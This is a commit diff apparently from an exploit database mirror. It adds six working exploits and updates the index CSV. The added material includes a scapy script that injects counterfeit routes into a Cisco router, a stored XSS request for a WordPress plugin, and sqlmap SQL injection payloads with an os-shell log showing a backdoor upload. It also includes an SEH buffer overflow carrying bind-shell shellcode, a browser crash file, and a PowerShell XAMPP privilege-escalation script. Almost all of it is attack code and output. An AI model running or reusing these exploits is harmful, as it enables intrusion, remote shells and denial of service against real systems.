DB: 2021-09-28

7 changes to exploits/shellcodes Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC) XAMPP 7.4.3 - Local Privilege Escalation Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS) Library System 1.0 - 'student_id' SQL injection (Authenticated)
2021-09-28 05:02:15 +00:00 · 2021-09-28 05:02:15 +00:00 · b104992c7d
commit b104992c7d
parent 7dffea89c5
8 changed files with 274 additions and 2 deletions
--- a/exploits/hardware/remote/50335.py
+++ b/exploits/hardware/remote/50335.py
@ -0,0 +1,76 @@
+# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
+# Date: 24/09/2021
+# Exploit Author: Michael Alamoot
+# Vendor Homepage: https://www.cisco.com/
+# Version: RV130W 1.0.3.44
+# Tested on: Kali linux
+
+#! /usr/bin/env python3
+from scapy.contrib.eigrp import EIGRPAuthData
+from scapy.contrib.eigrp import EIGRPIntRoute
+from scapy.contrib.eigrp import EIGRPGeneric
+from scapy.contrib.eigrp import EIGRPSeq
+from scapy.contrib.eigrp import EIGRP
+from scapy.layers.vrrp import VRRPv3
+from scapy.layers.vrrp import VRRP
+from scapy.layers.l2 import Ether
+from scapy.layers.inet import IP
+from scapy.sendrecv import sendp
+from scapy.volatile import RandMAC
+from scapy.all import conf
+import socket,networkx,os
+import argparse,sys,asyncio
+
+class argX:
+    def __init__(self):
+        self.parser = argparse.ArgumentParser(description="...")
+        self.parser.add_argument(
+            "-i","--ip",
+            help="ip router fake injection",
+            dest="ip",
+        )
+        self.parser.add_argument(
+            "-r","--ip-router",
+            help="ip router root",
+            dest="router",
+            default=conf.route.route('0.0.0.0')[2]
+        )
+
+    def argvX(self):
+        """ [0] ip-router [1] ip-fake """
+        args = self.parser.parse_args()
+        ip = args.ip
+        route = args.router
+        return [ip,route]
+
+
+class exploit(object):
+
+    def __new__(cls,*args,**kwargs):
+        return super(exploit,cls).__new__(cls)
+
+    def __init__(self,IProuter,InjectFackeRouter):
+        self.IProuter = IProuter
+        self.InjectFackeRouter = InjectFackeRouter
+        self.MAC = RandMAC()
+
+    def pyload(self):
+        pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\
+            /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\
+            /IP(src=self.IProuter,dst="224.0.0.10") \
+            /EIGRP(opcode="Update",asn=100,seq=0,ack=0
+            ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])
+        return pyload
+
+    def start(self,count=[0,100]):
+        for i in range(count[0],count[1]):
+            sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)
+            print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")
+
+if __name__ == "__main__":
+    a = argX().argvX()
+    if a[0]:
+        net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])
+        net1.start()
+    else:
+        print("[-h] [--help]")
--- a/exploits/php/webapps/50316.py
+++ b/exploits/php/webapps/50316.py
@ -74,8 +74,9 @@ class CVE_2019_13358:

        try:
            request = requests.get(self.args.url, params=params)
-        except:
-            raise Exception("Failed to GET to the URL provided")
+        except Exception as e:
+
+            raise Exception("Failed to GET to the URL provided", e)

        id = re.search(r"ID=([0-9])*", request.text)

--- a/exploits/php/webapps/50333.txt
+++ b/exploits/php/webapps/50333.txt
@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
+# Date: 2021-07-31
+# Exploit Author: Renos Nikolaou
+# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
+# Version: 2.2.4
+# Tested on: Windows
+# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities
+# because it fails to properly sanitize user-supplied input.
+
+# PoC - Stored XSS - Parameter: name
+# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
+# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
+# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)>
+# 4) Click Confirm
+# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )
+
+
+# Post Request (Step 4):
+
+POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
+Host: domain.com
+Content-Length: 205
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Content-Type: application/json
+Origin: http://domain.com
+Referer: http://domain.com/wordpress/booking-page/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+{"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
--- a/exploits/php/webapps/50334.txt
+++ b/exploits/php/webapps/50334.txt
@ -0,0 +1,50 @@
+# Exploit Title: Library System 1.0 - 'student_id' SQL injection (Authenticated)
+# Google Dork: intitle: "Library System by YahooBaba"
+# Date: 26/08/2021
+# Exploit Author: Vinay Bhuria
+# Vendor Homepage: https://www.yahoobaba.net
+# Software Link: https://www.yahoobaba.net/project/library-system-in-php
+# Version: v1.0
+# Tested on: Windows
+
+Description:
+
+The Library System 1.0 application from Yahoobaba is vulnerable to
+SQL injection via the 'student_id' parameter on the student.php page.
+
+==================== 1. SQLi ====================
+
+http://localhost:8081/library-system/student.php
+
+The "student_id" parameter is vulnerable to SQL injection, it was also tested, and an authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+POST parameter 'student_id' is vulnerable.
+
+step 1 : Navigate to the "Reg student >> View" & capture the request in the proxy tool.
+step 2 : Now copy the post request and save it as test.txt file.
+step 3 : Run the sqlmap command "sqlmap -r test.txt -p student_id --os-shell"
+
+----------------------------------------------------------------------
+Parameter: student_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: student_id=14 AND 9655=9655
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: student_id=14 OR (SELECT 5735 FROM(SELECT COUNT(*),CONCAT(0x7170717871,(SELECT (ELT(5735=5735,1))),0x716a787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: student_id=14 AND (SELECT 2937 FROM (SELECT(SLEEP(5)))UeMT)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 8 columns
+    Payload: student_id=14 UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x64697648614c6b48736a5a72484e52794d4764507670436659596379577748794a4878747162596c,0x716a787871),NULL,NULL,NULL,NULL,NULL-- -
+
+[14:03:50] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:8081/tmpbctla.php
+[14:03:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'desktop-Vinay\vinay'
--- a/exploits/windows/local/50332.py
+++ b/exploits/windows/local/50332.py
@ -0,0 +1,66 @@
+# Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)
+# Date: 24.09.2021
+# Software Link:   https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2
+# Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe
+# Exploit Author: Achilles
+# Tested Version: 1.3.8
+# Tested on: Windows 7 64bit
+
+# 1.- Run python code : Ether_MP3_CD_Burner.py
+# 2.- Open EVIL.txt and copy All content to Clipboard
+# 3.- Open Ether_MP3_CD_Burner and press Register
+# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
+# 5.- Click 'OK'
+# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer = "\x41" * 1008
+nseh = "\xeb\x06\x90\x90" #jmp short 6
+seh  =  struct.pack('<L',0x10037859) #SkinMagic.dll
+nops =  "\x90" * 20
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 =
+-e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
+#badchars "\x00\x0a\x0d"
+shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20
+"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
+"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
+"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
+"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
+"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
+"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
+"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
+"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
+"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
+"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
+"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
+"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
+"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
+"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
+"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
+"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
+"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
+"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
+"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
+"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
+"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
+"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
+"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
+"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
+"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
+"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
+"\x77\x03\x31\x3a")
+payload = buffer + nseh + seh + nops + shellcode
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
--- a/exploits/windows/local/50336.py
+++ b/exploits/windows/local/50336.py
@ -0,0 +1,27 @@
+# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)
+# Date: 2021-09-26
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://cyberfox.8pecxstudios.com
+# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
+# Version: v52.9.1 (Possibly all versions)
+# Tested on: windows
+
+#[ About - Cyberfox ] :
+#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
+#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
+
+# [ Exploit/POC ] :
+# 1.Run the python script, it will create a new file "output.txt"
+# 2.Run Cyberfox Web Browser
+# 3.Copy the content of the file "output.txt" & Paste  into the "search bar"
+# 4.Crashed
+
+Overflow = "\x41" * 9000000
+try:
+    f=open("output.txt","w")
+    print("[!] Creating %s bytes DOS payload...." %len(Overflow))
+    f.write(Overflow)
+    f.close()
+    print("[!] File Created !")
+except:
+    print("File cannot be created")
--- a/exploits/windows/local/50337.ps1
+++ b/exploits/windows/local/50337.ps1
@ -0,0 +1,14 @@
+# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
+# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Original Author: Maximilian Barz (@S1lkys)
+# Date: 27/09/2021
+# Vendor Homepage: https://www.apachefriends.org
+# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
+# Tested on: Windows 10 + XAMPP 7.3.10
+# References: https://github.com/S1lkys/CVE-2020-11107
+
+$file = "C:\xampp\xampp-control.ini"
+$find = ((Get-Content $file)[2] -Split "=")[1]
+# Insert your payload path here
+$replace = "C:\temp\msf.exe"
+(Get-Content $file) -replace $find, $replace | Set-Content $file
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11392,6 +11392,9 @@ id,file,description,date,author,type,platform,port
 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware,
 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python,
 50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows,
+50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
+50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
+50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18535,6 +18538,7 @@ id,file,description,date,author,type,platform,port
 50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",1970-01-01,"Christopher Ellis",remote,java,
 50216,exploits/linux/remote/50216.py,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",1970-01-01,"Khaled Salem",remote,linux,
 50282,exploits/hardware/remote/50282.txt,"ECOA Building Automation System - Hard-coded Credentials SSH Access",1970-01-01,Neurogenesia,remote,hardware,
+50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44447,3 +44451,5 @@ id,file,description,date,author,type,platform,port
 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
+50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
+50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,